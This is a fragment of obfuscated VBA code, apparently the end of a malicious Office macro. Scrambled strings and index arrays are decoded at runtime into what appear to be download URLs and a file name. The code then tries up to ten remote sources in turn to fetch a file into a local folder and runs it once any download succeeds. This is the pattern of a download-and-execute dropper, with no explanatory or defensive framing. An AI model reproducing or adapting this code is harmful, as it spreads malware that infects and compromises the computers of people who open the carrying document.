FTi = zjU(tYmLHoM, YgIqdtYK, rt)
Dim zhPayWCq As String
Dim GFhhLzI As String
Dim LFtlv(78) As Long
Dim nyTNk As Long
nyTNk = 43
GFhhLzI = "IrRdktJpmeaAUBtpGf/IflQraAKvdHsclEosC2AMYtQfRGzuqxqdtOFXTpKAxAVWQtpogwaU.PTddXTieZ/jWoidKFKlRpLU/GyJbcuswsWGiEkdhzZiMChyxfxAUBcuiKu:5pmOiPthjrEiLGbJTejJlsqwpBayFMYCrnP/xptrCLdfQ.HFpPAQryefqwBozEeWrcSOiNLVkgezRtoVGShQxWUNNrja/urusiVeTeYvktKtgWuxIDaQk"
LFtlv(0) = 113
LFtlv(1) = 6
LFtlv(2) = 6
LFtlv(3) = 8
LFtlv(4) = 132
LFtlv(5) = 19
LFtlv(6) = 19
LFtlv(7) = 18
LFtlv(8) = 35
LFtlv(9) = 50
LFtlv(10) = 133
LFtlv(11) = 73
LFtlv(12) = 6
LFtlv(13) = 80
LFtlv(14) = 9
LFtlv(15) = 80
LFtlv(16) = 11
LFtlv(17) = 31
LFtlv(18) = 6
LFtlv(19) = 5
LFtlv(20) = 35
LFtlv(21) = 73
LFtlv(22) = 8
LFtlv(23) = 22
LFtlv(24) = 19
LFtlv(25) = 70
LFtlv(26) = 35
LFtlv(27) = 2
LFtlv(28) = 4
LFtlv(29) = 8
LFtlv(30) = 2
LFtlv(31) = 10
LFtlv(32) = 31
LFtlv(33) = 31
LFtlv(34) = 19
LFtlv(35) = 38
LFtlv(36) = 47
LFtlv(37) = 2
LFtlv(38) = 95
LFtlv(39) = 47
LFtlv(40) = 12
LFtlv(41) = 63
LFtlv(42) = 19
LFtlv(43) = 35
LFtlv(44) = 60
LFtlv(45) = 242
LFtlv(46) = 249
LFtlv(47) = 172
LFtlv(48) = 126
LFtlv(49) = 134
LFtlv(50) = 8
LFtlv(51) = 149
LFtlv(52) = 214
LFtlv(53) = 80
LFtlv(54) = 161
LFtlv(55) = 74
LFtlv(56) = 248
LFtlv(57) = 55
LFtlv(58) = 209
LFtlv(59) = 102
LFtlv(60) = 123
LFtlv(61) = 1
LFtlv(62) = 58
LFtlv(63) = 51
LFtlv(64) = 183
LFtlv(65) = 112
LFtlv(66) = 18
LFtlv(67) = 47
LFtlv(68) = 63
LFtlv(69) = 164
LFtlv(70) = 235
LFtlv(71) = 157
LFtlv(72) = 67
LFtlv(73) = 178
LFtlv(74) = 206
LFtlv(75) = 53
LFtlv(76) = 53
LFtlv(77) = 147
zhPayWCq = zjU(GFhhLzI, LFtlv, nyTNk)
Dim ggVZNs As String
Dim W As String
Dim KVAO(12) As Long
Dim MRLRx As Long
MRLRx = 4
W = "PEkSNiZwgmXJMZ.rQpjtpXMXvgLTcFhQ"
KVAO(0) = 15
KVAO(1) = 20
KVAO(2) = 10
KVAO(3) = 18
KVAO(4) = 10
KVAO(5) = 2
KVAO(6) = 22
KVAO(7) = 13
KVAO(8) = 23
KVAO(9) = 7
KVAO(10) = 28
KVAO(11) = 18
ggVZNs = zjU(W, KVAO, MRLRx)
MIdtfjH = zCn()
MIdtfjH = MIdtfjH & ggVZNs
Dim OHR As Boolean
If Not OHR Then
OHR = Ox(Wt, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(BfCMB, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(scG, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(jlscQ, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(TFMz, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(eQK, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(nnY, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(nN, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(FTi, MIdtfjH)
End If
If Not OHR Then
OHR = Ox(zhPayWCq, MIdtfjH)
End If
If OHR Then
kJqesH MIdtfjH
End If
End Sub
…